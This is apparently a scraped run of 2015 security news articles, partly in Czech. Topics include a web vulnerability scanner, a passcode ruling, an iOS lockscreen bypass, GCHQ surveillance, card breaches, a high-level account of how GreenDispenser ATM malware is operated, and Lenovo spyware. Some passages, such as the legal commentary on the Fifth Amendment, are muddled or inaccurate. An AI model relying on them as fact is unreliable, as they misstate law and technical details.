Scale is obviously implied for large Web, while Coverage has two dimensions – Crawl and Fuzzing.
Crawl's ability is to find as much of the Web application's footprint as possible, whereas Fuzzing involves testing each part of the application's components for an applied set of vulnerabilities.
Gryffin's Crawler is designed to search "millions of URLs" that might be driven by a single template from just one of the URLs to work.
Moreover, the crawler also includes a de-duplication engine for comparing a new page with an existing one and thus allowing it to avoid crawling the same page twice.
Gryffin's Crawler also has PhantomJS, which is used to handle DOM rendering in client-side JavaScript applications.
Gryffin's Requirements
The requirements for Gryffin are as listed below:
PhantomJS v2
The NSQ distributed messaging system
Sqlmap for fuzzing SQL injection
Arachni for fuzzing XSS and Web vulnerabilities
Kibana and Elastic Search for dashboarding
Besides Yahoo!, many major companies have released their own web application vulnerability scanners to make Internet experience safe for users.
Back in February, Google released its own free web application vulnerability scanner tool, dubbed Google Cloud Security Scanner, which potentially scans developers' applications for common security vulnerabilities on its cloud platform more effectively.

Police Can't Force You To Unlock Your Phone, It violates Fifth Amendment Rights

Can the Cops can make you unlock your iPhone?
According to a recent Federal Court’s ruling, it is not okay for police to force suspects to unlock their phones with a passcode.
And, doing so would be a violation of your Fifth Amendment Rights in the US Constitution.
The ruling came as the conclusion of a case, where Securities and Exchange Commission (SEC) accused Bonan Huang and Nan Huang for conducting illegal Insider Trading.
As a result of which, the investigating agencies cannot question the suspects for giving out their smartphone passcodes or any form of encryption passwords or even their existence on the suspect's device.
They are said to have used their positions as data analysts at Capital One Bank (credit card issuing Bank). The bank gave each of them a mobile phone, allowing them to use a passcode of their choice.
Huang’s left Capital One and submitted the mobile phones to the bank, the bank then gave the mobile phones to SEC locked with passcodes.
Now, SEC unable to unlock the devices puts accusations on them that:
Huangs’ conducted random non-public database searches of their employer and obtained aggregated sales data for the companies they searched; beyond their scope of work.
Huangs’ worked against their duties by using the non-public information for their personal gains.
Collectively, Huangs’ “Made profitable securities transactions on the basis of this material, non-public information in advance of the public release of quarterly sales announcements by these companies.”
Judge Kearney disagreed, though,
“Since the passcodes to Defendants’ work-issued smartphones are not corporate records, the act of producing their personal passcodes is testimonial in nature and Defendants properly invoke their Fifth Amendment privilege.”
The 5th amendment is more than 200 years old, who knew in that era that it would become useful like this; for criminal proceedings against the crimes done in the Cyberspace.
However, if there are evidence that support the criminal charges on an accused, then he/she is not entitled to opt for such privilege.
Also, if the accused accepts committing a cyber crime, hides it under an encryption, and further appeals to take the fifth then he is not allowed to get that privilege.
The Fifth Amendment Says:
“No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a Grand Jury, except in cases arising in the land or naval forces, or in the Militia, when in actual service in time of War or public danger; nor shall any person be subject for the same offence to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.”
So, who’s right?
But, when SEC is sure about Huang's being the culprits then they can appeal to a higher court for the forensic examination of the mobile devices.
However, if the fifth amendment says the suspects cannot be questioned for self-incrimination, but if a higher court of law orders to initiate forensic investigation of the two devices allotted to Huang’s then it can reveal the truth.
Also, if SEC lacks in providing acceptable evidence supporting their accusations then the court may not allow for the forensic examination as well.

Latest iOS 9.0.1 Update Failed to Patch Lockscreen Bypass Hack

iOS 9.0.1 – Apple's first update to its new iOS 9 mobile operating system, came out on Wednesday, addressed several bugs in its software.
However, unfortunately, it seems that the latest update iOS 9.0.1 doesn't fix the lock screen bypass vulnerability reported by iPhone user Jose Rodriguez.
Yes, the serious flaw in iOS 9 that allows anyone – with physical access of your iPhone or iPad – to bypass your device's lock screen and get into your contacts and personal photographs, also Works on iOS 9.0.1.
Video Demonstration:
Rodriguez published a new video detailing a step-by-step explanation on how to bypass the passcode on iOS 9 and iOS 9.0.1 device, using the benevolent nature of Apple's personal assistant Siri.

The lock screen bypass vulnerability works on all iOS versions from iOS 5.1.1 to the latest released iOS 9.0.1.
So, until Apple rolls out an update to patch this bug, the only way available to iPhone users to mitigate the issue is to disable Siri from being accessed from the lock screen.
To disable Siri on the lock screen, follow these simple steps:
Go to Settings
Select Touch ID & Passcode
Enter your passcode in the prompt
Look for "Allow access when locked" section and Disable Siri
The iOS lock screen bug is similar to that fixed in the latest version of Android Lollipop. The Android lock screen bypass bug was far more complex than the current iOS bypass, as well as the impact was also worse.
The Android lock screen bypass gave attackers access to all important files as well as the ability to install malicious apps on the affected device.
However, it's been a bad week for Apple's iOS security with the discovery of nearly 4,000 malware-infected applications on the App Store.

uh-oh! North America Runs Completely Out of IPv4 Internet Addresses

Two months ago, THN reported about a similar announcement made by The American Registry for Internet Numbers (ARIN), which said that the agency is no longer able to produce IPv4 addresses in North America.
Within a time frame of few months, ARIN, which handles Internet addresses in America, has announced the final exhaustion of their free pool of IPv4 addresses has reached zero...
...i.e. the availability of IPv4 (Internet Protocol version 4) addresses no more exists.
Meanwhile, they are going to accept requests for IPv4, which will be approved via two ways:
Wait List for Unmet IPv4 Requests - Join the waitlist for unmet requests in the hopes that a block of the desired size will be available in the future.
IPv4 Transfer Market - Can be purchased from another organization that has more than it needs.
So, in the future, IPv4 address space will be allocated to the approved requests on the Waiting List for Unmet Requests, if ARIN:
receives any IPv4 address space from IANA (Internet Assigned Numbers Authority),
recovers from cancellations, or
returns from organizations.
They say, "The source entity (-ies within the ARIN Region (8.4)) will be ineligible to receive any further IPv4 address allocations or assignments from ARIN for a period of 12 months after a transfer approval, or until the exhaustion of ARIN's IPv4 space, whichever occurs first."
These changes will impact the organizations existing in Transfers between Specified Recipients within the ARIN Region (Transfer 8.3) and Inter-RIR Transfers to Specified Recipients (Transfer 8.4).
RIR refers to Regional Internet Registry, like ARIN, which is one of the RIRs.
Also, if they are successful in allotting IPv4 address pool to the waiting list entities and are still left with IPv4 addresses, then they will open the free pool for IPv4 addresses and add them there for future use.
We see this is just the start of an era (IPv6).
IPv6 was invented in about two decades ago in 1998, and it features much longer addresses, such as — FE80:0000:0000:0000:0202:B3FF:FE1E:8329. This means that IPv6 will offer a total available pool of 340 Trillion Trillion Trillion addresses, providing capacity for a very long term.

Karma Police, how GCHQ tried to track every visible user on Internet

A new collection of GCHQ’s documents published by The Intercept reveals how the British Agency tried to track Web visits of “every visible user on Internet”
A new revelation made by The Intercept confirms that the UK Government Communications Headquarters (GCHQ) has conducted a massive online surveillance starting from the 2007.

The documents accessed by The Intercept detailed an operation called “Karma Police” carried out by the GCHQ, the British intelligence tracked online habits of people on a global scale.

KARMA POLICE is also the name of a popular song published in 1997 by the British band Radiohead, suggesting the spies may like it.

The intelligence agency defined the Karma Police as the “world’s biggest” Internet data-mining operation, the program was launched by the GCHQ in an attempt to track “every visible user on the Internet.”

The Karma Police aimed to track individuals listening to Internet streaming audio “radio stations” with the purpose of identifying any abuse of the radio instrument to spread messages among radicals.

“The power of KARMA POLICE was illustrated in 2009, when GCHQ launched a top-secret operation to collect intelligence about people using the Internet to listen to radio shows.” states The Intercept. “A summary report detailing the operation shows that one aim of the project was to research “potential misuse” of Internet radio stations to spread radical Islamic ideas.”
karma police 2

The Karma Police system collected in its Black Hole database log the IP addresses of any individual visiting websites, as well as the associated cookies (referenced in the document as “presence events” and “target detection identifiers”).

The Black Hole is considered the core of the GCHQ online spying operations, it is used to store raw logs of intercepted material before it has been subject to analysis.

blackhole gtac GCHQ

blackhole gtac GCHQ

Among the websites used to track users, there are Amazon, BBC, CNN, Facebook, Google, Microsoft Live, Reddit, Reuters, WordPress, Yahoo, YouTube, and YouPorn.

“To find out the identity of a person or persons behind an IP address, GCHQ analysts can enter the series of numbers into a separate system named MUTANT BROTH, which is used to sift through data contained in the Black Hole repository about vast amounts of tiny intercepted files known as cookies.”

The cookies are a precious information for the online marketing, their analysis allows advertisers to track users’ habits, the same principle exploited by the GCHQ in its surveillance program.

“Cookies are automatically placed on computers to identify and sometimes track people browsing the Internet, often for advertising purposes. When you visit or log into a website, a cookie is usually stored on your computer so that the site recognizes you. It can contain your username or email address, your IP address, and even details about your login password and the kind of Internet browser you are using — like Google Chrome or Mozilla Firefox.” continues The Intercept.
The agent tracked the users of “websites of interest” by correlating the cookies associated to their web experience.

The British spies targeted streams that included Islamic religious content in an effort to identify their Skype and social media accounts of the radicals. By 2009, the Karma Police program allowed the GCHQ to store over 1.1 trillion “events”, a term used to refer web browsing sessions. By 2010, the overall volume of collected data reached 30 billion records per day of Internet traffic metadata. According to another GCHQ document, by 2012 the volume grew to 50 billion per day.

The analysis of the cookies allowed the GCHQ agents to discover when individuals were online and their location.

The GCHQ documents also revealed the arsenal of the British intelligence used in the Karma Police Operation. “Infinite Monkeys” was a tool used to track Web bulletin boards, meanwhile the “Samuel Pepys” tool was used to parse the content of Internet sessions and extract instant messages and e-mails.


Card Breach at Hilton Hotel Properties Under Investigation

Hilton Worldwide has issued an official statement informing its customers that the alleged data breach is currently under investigation.
As reported by Brian Krebs of Krebs on Security, several sources are claiming that Point-of-Sale (PoS) registers utilized by several businesses operating within a large quantity of Hilton Hotel and franchise properties across the United States.

These claims result from the correlation of data discovered throughout the duration of an unknown number of credit card fraud cases. The alleged common point-of-purchase for the cards being flagged as compromised was determined by five different banks, according to internal sources, to be one of several Hilton properties.

These properties include not only just leading Hilton locations but also Hilton locations:

Embassy Suites, Doubletree, Hampton Inn and Suites, and Waldorf Astoria Hotels & Resorts.

In August of this year, Visa alerted several financial institutions to inform them that a breach had been discovered at a physical entity. Visa determined that the breach extended from April 21, 2015 to July 27, 2015.

The breached entities’ identity was not disclosed by Visa, as per their policy when distributing such alerts.

Hilton has issued an official statement that the alleged data breach is currently under investigation. The number of Hilton properties affected by this breach is currently unknown; however, Brian Krebs reports that several in-the-know sources have stated that this breach may have originated back as far as November 2014, and resultant nefarious activity may be ongoing.

In a statement to NBC News, a Hilton Worldwide spokesperson said it was aware of the report.

“Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace,” the statement said. “We take any potential issue very seriously, and we are looking into this matter.”

Antiviry jako Kaspersky Antivirus mohou počítač vystavit ještě větším hrozbám

26.9.2015 Hrozby
Antivirové aplikace a podobné bezpečnostní softwary mají zařízení svých uživatelů chránit. Avšak rostoucí počet výzkumů odhaluje, že v některých případech mohou antiviry počítač otevřít hrozbám, kterým by jinak čelit nemusel.

Posledním takovým příkladem je antivirový program společnosti Kaspersky Lab. Člen výzkumného týmu Google Project Zero Tavis Ormandy nedávno analyzoval její nejvíce využívané programy a rychle odhalil několik snadno zneužitelných bugů.

Ty mohly být využity například k dálkovému spuštění škodlivého kódu. Kaspersky již většinu těchto chyb opravil a intenzivně pracuje na nápravě těch ostatních. Ormandy však na svém blogu zveřejnil příspěvek, podle kterého Kaspersky není jediným hráčem na trhu s těmito kritickými chybami.

„Máme silné důkazy, že existuje aktivní černý trh obchodující s chybami v antivirech,“ napsal Ormandy, „Výzkumy ukazují, že právě snadno přístupný povrch softwaru dramaticky zvyšuje riziko útoků. Proto je povinností každého prodejce antivirových programů dodržovat ty nejvyšší bezpečnostní standardy a minimalizovat tak škodu způsobenou jejich softwary.“

Ormandy naznačil, že chyby, které našel v produktech Kaspersky, se dají nejpravděpodobněji zneužít ve velice úzce zaměřených útocích podobným těm, jaké americká Národní bezpečnostní agentura (NSA) prováděla proti teroristům nebo špionům.

To znamená, že většině lidí se instalace antivirového softwaru stále vyplatí. I přesto jsou však jeho výsledky znepokojivé. Ukazují totiž, že i programy, na které spoléháme při své ochraně, nás můžou ještě více poškodit.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Kaspersky není jediným poskytovatelem softwaru, který čelí chybám ve svých produktech. Čtyři kritické chyby byly tento měsíc nalezeny také v produktech prodávaných bezpečnostní společností FireEye. Jedna z nich umožňovala útočníkovi ze serveru, na kterém program běžel, získat citlivá a chráněná data. Ormandy odhalil vážné díry také v antivirových programech firem Sophos a Eset.

„Chtěli bychom naše klienty a zákazníky ujistit, že chyby, které odhalil člen týmu Google Project Zero Tavis Ormandy, již byly ve všech dotčených produktech Kaspersky Lab opraveny. Naši specialisté nenašli žádné důkazy, že byly tyto chyby jakkoliv zneužity,“ uvedli mluvčí Kaspersky Lab v oficiálním prohlášení.

Společnost dále potvrdila, že aby mohly její produkty v budoucnu čelit útokům lépe, učiní v nich několik architektonických změn. Mezi tyto úpravy patří například implementace ochrany zvané stack buffer overflow.

Další plánovaná vylepšení by se měla soustředit na zmírnění dopadů chyb, například implementace metody address space layout randomization (ASLR) nebo zabránění stahování odhalených dat. Ormandy po zveřejnění svého článku také poděkoval Kaspersky Lab za její rekordně rychlou odpověď.

Zpráva je však i přesto jasná. Aby mohly správně fungovat, musí antivirové softwary získat vysoce privilegovaný přístup k počítačům, které ochraňují. Této citlivé pozice se pak dá snadno zneužít.

Ormandy doporučil developerům antivirů, aby pro své produkty vybudovali bezpečnostní sandboxy, které budou izolovat stažené soubory od hlavních částí počítačového operačního systému.

GreenDispenser, is the last ATM Malware in the wild

The last threat discovered by security experts at Proofpoint is “GreenDispenser,” a malware that presents many similarities with the Tyupkin malware.
The use of malicious code to hack ATM is even more common in the criminal ecosystem, in the past security experts have discovered several strain of malware that was designed with this intent.

ATM malware such as Tyupkin, Ploutus, PadPin and SUCEFUL are a few sample of this kind of threat that allowed hackers to steal cash directly from ATM machines.

The last threat discovered by security experts at Proofpoint is “GreenDispenser,” a malware that presents many similarities with the Tyupkin malware.

hacking ATM

The installation GreenDispenser requests a physical access to the targeted ATM, then the attacker can instruct the machine directly from the PIN pad and order the machine to dispense cash.

“GreenDispenser provides an attacker the ability to walk up to an infected ATM and drain its cash vault. When installed, GreenDispenser may display an ‘out of service’ message on the ATM — but attackers who enter the correct pin codes can then drain the ATM’s cash vault and erase GreenDispenser using a deep delete process, leaving little if any trace of how the ATM was robbed.” states the experts at Proofpoint.

Similar to other ATM malware, GreenDispenser implements the XFS, the Extension for Financial Services DLL library(MSXFS.dll) that is specifically used by ATMs. The library provides a special API for the communication with the ATM’s PIN pad and the cash dispenser.

The experts highlighted that GreenDispenser represents an evolution of the Tyupkin ATM malware, the menu used to control the ATM is protected by a two-factor authentication (2FA) mechanism and the malware is designed to operate only for a limited period of time.

According to Proofpoint, the first PIN is hardcoded meanwhile the second code is obtained by decoding a QR code displayed on the screen. The researchers believe cyber criminals likely use a mobile app to decode the QR code and obtain the dynamic authentication code.

The GreenDispenser ATM malware attempts to obtain the names of the PIN pad and the cash dispenser by querying specific registry location, if this method fails it tries the default names “Pinpad1” and “CurrencyDispener1.”

Once the fraudster is authenticated to the ATM, the machine displays a menù that is used to dispense money such as uninstall the malware.

The CurrencyDispener ATM malware checks the current date before running, it is designed to operate in 2015 and the month must be ot prior to September. The feature has been implement to deactivate the malware avoid detection.

The experts have no doubt, the ATM will continue to be a privileged instrument for crooks that will improve their malicious code to avoid detection.

“ATM malware continues to evolve, with the addition of stealthier features and the ability to target ATM hardware from multiple vendors,” states Proofpoint.

Exploiting Browser Cookies to Bypass HTTPS and Steal Private Information

A newly discovered critical flaw in the implementation of web cookies by major browsers could open secured (HTTPS) browsing to Man-in-the-middle attacks.
The US Computer Emergency Response Team (CERT) has revealed that all the main browser vendors have improperly implemented the RFC 6265 Standard, also referred to as "Browser Cookies," allowing…
…remote attackers to bypass secure HTTPS protocol and reveal confidential private session data.
Cookies are small pieces of data sent from web sites to web browsers, which contains various information used to identify users, or store any information related to that particular website.
HTTPS Cookie Injection Vulnerability
Whenever a website (you have visited) wants to set a cookie in your browser, it passes a header named “Set-Cookie” with the parameter name, its value and some options, including cookie expiration time and domain name (for which it is valid).
It is also important to note that HTTP based websites does not encrypt the headers in any way, and to solve this issue websites use HTTPS cookies with "secure flag", which indicates that the cookies must be sent (from browser to server) over a secure HTTPS connection.
However, the researchers found that some major web browsers accept cookies via HTTPS, without even verifying the source of the HTTPS cookies (cookie forcing), allowing attackers with man-in-the-middle position on a plain-text HTTP browsing session to inject cookies that will be used for secure HTTPS encrypted sessions.
For an unprotected browser, an attacker can set HTTPS cookie masquerading as another site ( and override the real HTTPS cookie in such a way that even the user might not realise it's a fake while looking through their cookie list.
Now, this malicious HTTPS cookie is controlled by the attacker, thus being able to intercept and grab private session information.
The issue was first revealed at the 24th USENIX Security Symposium in Washington in August when researchers presented their paper that said that cookie injection attacks are possible with major websites and popular open source applications including…
…Google, Amazon, eBay, Apple, Bank of America, BitBucket, China Construction Bank, China UnionPay,, phpMyAdmin, and MediaWiki, among others.
Affected Browsers:
The Affected major web browsers includes previous versions of:
Apple’s Safari
Mozilla’s Firefox
Google’s Chrome
Microsoft’s Internet Explorer
Microsoft’s Edge
However, the good news is that the vendors have now fixed the issue. So, if you want to protect yourself from this kind of cookie injection MitM (Man-in-the-Middle) attack vectors, upgrade to the latest versions of these web browsers.
CERT also recommended webmasters to deploy HSTS (HTTP Strict Transport Security) on their top-level domain.

NeoKylin: China's Linux OS that Seriously Looks Like Windows XP

Do You Know: China has planned to eliminate all foreign Technologies and Services by 2020, just like Google and Facebook.
And it seems China in some years would be an entirely independent IT economy; building homegrown Mobile and computer devices, Operating Systems, Applications, Browsers and almost everything existing in the IT ecosystem.
Well, China was not at all happy when Microsoft finally announced the end of official support for Windows XP. At the time, Windows holded 91% of total market share, compared to just for Mac OS X and just 1% for Linux.
However, China wasn't interested to pay either for extended support for Windows XP or for switching to Windows 8. So, they decided to develop their own Operating System.
Yes, China has developed a Desktop Operating System named “NeoKylin” (and ‘Kylin’ in Chinese), tagged as a substitute to Windows XP by Quartz, who got an opportunity to have a hands-on experience of its “community version” OS.
NeoKylin is developed by Shanghai-based China Standard Software Company and already running on more than 40% of commercial units sold in the country by Dell.
NeoKylin Looks Like Windows XP
NeoKylin looks something like this:
NeoKylin, the Microsoft Windows XP replacement is similar in the following manner:
The complete user interface and essentials like Window’s control, XP’s classic start button and folder’s icon are exactly the same.
The folder names used are also same like: there’s a Recycle Bin, My Computer and Control Panel to name a few.
NeoShine Office Suite offering similar functionalities of Windows Excel, Word and PowerPoint.
The classic rolling-hills-and-clouds desktop Wallpaper as was in XP gets a new face with qilin, the mythical chimera-like beast that the OS is named after.
NeoKylin has Built-in Linux Terminal
Moreover, the Chinese OS has something more on board i.e. Linux terminal.
Yes, the Linux terminal also exists where commands can be run, and information about the OS can be captured from it.
Beware! It is Not an Easy Going OS
While exploring NeoKylin, Quartz found out that it has certain restrictions which does not allow any third party installations on the system.
The operating system comes with pre-installed applications like:
Firefox for web browsing
A music player
An open-source image editor GIMP
A calculator
Though besides this, the version on Dell systems is packed with more applications and games.
However, while trying to install Google Chrome, NeoKylin pushed the installation backwards. Moreover, according to Quartz “It wasn’t just Chrome”.

However, with the availability of Yellowdog Updater, Modified (Yum) package management, a commoner in Linux allowed additional program installations.
To Push Windows 10 in China, Microsoft Partners with Baidu
China’s dodgy intentions on not installing Windows 8 raised a few eyebrows, some said because Windows 8 is expensive while some also said because of suspicion over American spying; reason why Windows 8 couldn’t make a landing in China.
China has always been cautious about the IT infrastructure of their country, even after updates and supports are closed 14-year old Windows XP is still in use in the majority of the systems in the country.
Though a few percentage of Chinese Government also use Windows 7, now that percentage might get drop too after the availability of their native OS.
China has always believed in accepting things on their terms and conditions. This proves correct with their recent teaming up with Microsoft with the goal of pushing Windows 10 in China, but…
...Microsoft Edge will be having Baidu, the domestic search engine of China instead of Microsoft Bing.

Virus Bulletin small talk: Diversity in tech

Hardly a week goes by anymore between posts about the impending doom that will be brought about by a lack of science, technology, engineering and math (STEM) workers, particularly in the US. There are many who feel that the shortage is a myth. If you drill down further into different STEM disciplines, and into different specific demographics, the picture gets even more complex.
Top universities are saying that they’re graduating twice as many African American and Hispanic people with computer science degrees than are being hired. Women are statistically more likely to be unemployed from computer-related jobs than are men. This implies that there are considerably more people out there who are potential job candidates than are being hired.
But there are plenty of people who are worried about the existing “negative unemployment” rate in certain sectors of technology, particularly in information security. Certainly in the wake of ever-larger breaches in retail, healthcare, education and government, demand for talented defenders is significant.
What now?
Next week begins the 25th annual Virus Bulletin conference in Prague, Czech Republic where my fellow researcher Stephen Cobb and I will be leading a discussion of this topic. We’ll be discussing a variety of aspects of this shortage: including whether improving diversity and the educational pipeline can help, or if we need to decrease burnout and turnover, and how people are going about changing things at various levels.
So if you’re at Virus Bulletin next week, please stop by and join our discussion. If you can’t be with us in Prague, you can also follow the conference and join the discussion on Twitter at ‪#VB2015.

DHS working on ‘self-destructing’ security chip for smartphones

The Department for Homeland Security (DHS) in the US has revealed that it is working with the Boeing Company to develop a so-called “brain chip” that would allow any smartphone to “self-destruct”.
In theory, this technology will provide users with additional, “intelligent” security, so that in the event a smartphone is stolen or lost, the device will intuitively implement self-protective measures.
The chip would be able to detect unusual activity because it will have been gathering data on its user’s behaviour, including the way they walk and talk, Nextgov reported.
This information will have been generated organically, through an individual’s use of features such as a camera, microphone and touchpad.
Speaking to the online news provider, Vincent Sritapan, program manager for mobile security R&D at the DHS, said that the chip will have the capacity to “simulate human learning”.
The chip’s effectiveness will be tested on the Boeing’s Black Smartphone, which is aimed at government agencies and their contractors.
This particular smartphone has been designed with security professionals in mind and is considered to be one of the most impenetrable devices in the world.
Some of the unique features include a bespoke Android operating system, enhanced modularity to tailor its use to certain missions and “embedded hardware media encryption”.
“Despite the continuous innovation in commercial mobile technology, current devices are not designed from inception with the security and flexibility needed to match their evolving mission and enterprise environment,” Boeing states online.
The threat to smartphones has increased significantly over the last few years, with experts warning that they are becoming more complex.
Rolf von Roessing, former vice-president of security trade body ISACA, said in 2013 that one of the greatest challenges facing security professionals is dealing with the implications of greater interconnectedness.
He was quoted by Computer Weekly as saying: “Where there are clusters of wirelessly connected devices, it will become increasingly difficult to identify infections or where they have come from.”

Why parents must teach their children about internet security

Parenting, as we know it, is evolving in this modern, digital age.
Mothers and fathers have traditionally warned their sons and daughters of the physical dangers they face, be that pickpockets on the street or strangers in the park. Today, however, parents are facing an altogether different challenge – keeping their children safe on the world wide web.
Children of all ages now use the internet on a daily basis, for everything from Facebook and Instagram to shopping, gaming and streaming the latest TV shows. As a result, these youngsters are just as likely to suffer from cyberbullying as bullying, or from digital fraud as a pickpocket on the street.
However, despite this – and the never-ending news on cybercriminals, data breaches and cyber extortion – parents are still getting used to the internet and its hidden dangers.
Are parents doing enough to keep their children safe?
A recent NSPCC survey of more than 2,000 parents of children between eight and 13, carried out by YouGov, found that parents are avoiding conversations with their children about the need to stay safe online.
The poll reported that while 91 percent of eight-year-olds use the internet at least once a week, parents, on average, think that nine is a suitable age for children to be informed of the issues around online safety.
Even then, many are reluctant to take on this responsibility. For example, nearly a third (31 percent) of all surveyed parents admitted they would refer their child to another adult or sibling if they asked them questions about an issue they had experienced online.
Additionally, one in six (16 percent) said they were more confident giving advice to their child about staying safe in “real life” than staying safe online.
Online education is more important than ever before
Child welfare experts have warned that children are potentially missing out on vital online advice and support at a crucial time in their development, and have encouraged parents to speak up.
In the NSPCC’s study, of the 1,000 children surveyed whose parents had spoken to them about online safety, near two-thirds (60 percent) said that they had modified their online behavior as a result.
Without this kind of engagement from their parents, children may find themselves more at risk of online dangers – they simply do not have the skills or knowledge needed.
“Sadly we know that children up and down the country (UK) are struggling because of difficult experiences online,” Peter Wanless, CEO of the charity, commented at the time.
“Thousands of young people contact us about issues such as online grooming, cyberbullying and after viewing sites which encourage eating disorders, self-harm and suicide.
“We want to help parents recognize that for their children there is often no distinction between the online and offline world.”
Parents feel as though they are out of their depth
Internet security
There is clearly a disconnect between parents and their children on internet safety, as another survey has demonstrated.
ESET reported that while 88 percent of parents were worried about what their children can access online, only a few had taken steps to safeguard their child’s online experience through the use of security software and parental controls on mobile devices.
The study, which was of 2,000 parents across the US and UK, found that 37 percent of children did not have security software on their mobile or tablet, with only 34 percent of parents having installed a parental control app.
When asked “What specifically concerns you when your child accesses the internet on a smartphone or tablet?” security concerns came out on top.
81 percent cited their child visiting inappropriate web pages as being the most troubling; 71 percent said it was their children forwarding personal details to strangers; while 61 percent highlighted excessive amounts of times spent on devices as being alarming.
There is a lot parents can do with little effort or difficulty
In spite of many mums and dads feeling ill-equipped or uneasy about explaining online safety, there really isn’t any need to be. Parents can in fact do a lot to help their children understand the risks, and fortunately a lot of this is straightforward.
For example, parents should encourage their children to use strong passwords and/or a password manager and to avoid clicking on suspicious links sent on social media or via email.
Internet security
Youngsters should also be advised to be wary of imputing sensitive information on unknown websites, which could be fake pages set up with cybercriminals.
Further, parents should explain the disadvantages of posting “too much” personal information on social networking sites (as this can be used by attackers for targeted phishing email campaigns).
Children that are the victim of cyberbullying should hold onto the abusive messages they’ve received in order to share these with their family, school and – if necessary – child support groups and the police. They should also use the ‘block user’ and ‘report user’ options on Facebook and Twitter.
If parents want to take things a step further, they could ensure their child’s computer has an up-to-date security solution, runs the latest software (reducing the likelihood of attackers exploiting software vulnerabilities) and backs up personal files to a hard disk drive or secure cloud service provider.
Towards a safer and more future
Internet security
All of the above is just the tip of the iceberg and when it comes to educating children on online safety – there is so much more parents can do. Some intrepid mums and dads have their children using VPNs (virtual private networks), while others have urged their youngsters to use HTTPS websites for an encrypted web communication.
And, who knows, through the dialogue that parents have with their children, they may find that their advice strikes a “security chord”. Not only do they discover that there is an interest in this area, but a talent too. Luckily, there are plenty of ways of nurturing this flair.
But to get there, parents need to be active in broaching online safety with their children. Starting the conversation is the hardest part; but after breaking down this barrier, everything else is an opportunity.

The US military is still sending un-encrypted emails

The MotherBoard news website recently published an interesting analysis on how the US Military Fails to Protect its Soldiers’ Emails, how is it possible?
After the Edward Snowden case blown up in the US Government face, the US decided to create a task force to encrypt all that can, urging the adoption of HTTPS for all the government websites. Good idea, but there is still something missing in all this process, the email encryption.

In this specific case, the US military leaves their soldiers emails unencrypted, exposing them to possible interception by threat actors.

The principal technologist at the American Civil Liberties Union (ACLU), Chris Soghoian has been trying for years to push the adoption of encryption said something curious, “This is a pervasive problem in the government,” And in many ways it affects the parts on the government that should be more focused on security—they’re doing it worse.”

For obvious reasons the Military should be the ones given the example in terms of security, but surprisingly they aren’t alone in this, because neither Pentagon, including the Army, the Navy, the Defense Security Service, and DARPA, are using email encryption.

Inside the military only Air Force is using encryption in their emails, using STARTTLS to encrypt their e-mails.

STARTTLS is mainly a protocol that encrypts emails traveling from server mail to server mail, big companies (example Google) are using it to help in the standardization of encryption.

Even if you are encrypting your emails that doesn’t mean you are safe, because if your email provider doesn’t use STARTTLS, you are only encrypting your email from your computer to your provider, meaning that after travels across the internet in clear text (after getting out from the server of your email provider). By the way, this can be avoided with end-to-end encryption.

Let’s get some practical example to visualize what happens when your email provider doesn’t support STARTTLS:

US military email encryption

The red line means that after getting out from your email provider server, the email is open to be read until it enter in the recipient’s email provider.

When emails provider support STARTTLS every single part of the email’s path will ensure encryption as can be seen:

US military email encryption 2

I already reported that Google is using STARTTLS, what I haven’t told is that they are using it since the launch of Gmail in 2004, other companies like Microsoft Facebook, Twitter, Yahoo, only did their STARTTLS Implementation in 2014.

All this to get the key point of the article, private companies are going in the right direction, but how about the US Government? There the story is a bit different.

A spokesperson for the Defense Information Systems Agency (DISA), the Pentagon’s branch that oversees email and other technologies said their Enterprise emails doesn’t support STARTTLS.

“STARTTLS is an extension for the Post Office Protocol 3 and Internet Message Access protocols, which rely on username and password for system access,” “To remain compliant with DOD PKI policy, DEE does not support the use of username and password to grant access, and does not leverage either protocol.”

Opinions, commenting the words of the spokesperson said things like:

“an unacceptable and technically inept answer,”,

“I can’t think of a single technical reason why they wouldn’t use it,”

Now let’s again think about the US military, and for that I will be given a case scenario, a US military unit goes to Afghanistan and soldiers are sending emails, this means that the soldiers e-mail could be intercepted by a foreigner government, that is controlling the internet infrastructure in that country.

There are more agencies not using this layer of security, like the FBI, he Office of the Director of National Intelligence ( DNI), CIA, but it’s unclear why they don’t, NSA for example, is using STARTTLS.

The thing is, implementing STARTTLS its very cheap, and so , leaves me to believe that the reason why they aren’t using it may be related to other reasons that we can’t still comprehend, but one things is sure, STARTTLS should became a standard not only in the private domain, but also in the public (governments related) domain.

Lenovo Caught (3rd Time) Pre-Installing Spyware on its Laptops

Lenovo has once again been caught installing spyware on its laptops and workstations without the user's permission or knowledge.
One of the most popular computer manufacturers is being criticized for selling some refurbished laptop models pre-installed with invasive marketing software that sends users data directly to the company.
This is not first time Lenovo has allegedly installed spyware onto consumers PCs.
Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware that opened up doors for hackers.
In August, Lenovo again got caught installing unwanted and non-removable crapware into part of the BIOS reserved for custom drivers.
Lenovo Laptops comes Pre-installed with 'Spyware'
Now, the Chinese computer manufacturer is making news once again for embedding tracking software into its laptops and workstations from Lenovo ThinkPad, ThinkCentre, and ThinkStation series.
Michael Horowitz from Computerworld has discovered a software program, called "Lenovo Customer Feedback Program 64," that operates daily on these systems and can be categorized as Spyware.
The purpose of this program is to send customers' feedback data to Lenovo servers. According to Horowitz, the company has mentioned this in its EULA, but he "can not recall ever being asked [for] a Customer Feedback program" while ever setting up his Lenovo PC.
Horowitz also found that this program includes some other files, which is as follows:
One of these files belongs to Omniture, which is an online marketing and Web analytics company, which is included to track and monitor users' activities and send that data to this online marketing agency.
Lenovo does mention on its website that there may be software program installed on its systems that connect to its online servers, but it does not mention anything about sending your data for financial profit.
How to Remove Lenovo Spyware?
In order to remove 'Lenovo Customer Feedback Program 64' from your affected machines, you have to do it manually. Follow these simple steps:
Know your System Type (whether it's a 32-bit or 64-bit version of Windows)
Download TaskSchedulerView
Now, search your Lenovo PCs for Lenovo Customer Feedback Program 64
Disable Lenovo Customer Feedback Program 64 daily task from running
Additionally, you can also rename the "C:\Program Files (x86)\Lenovo"

Japanese Banking Trojan Shifu Combines Malware Tools

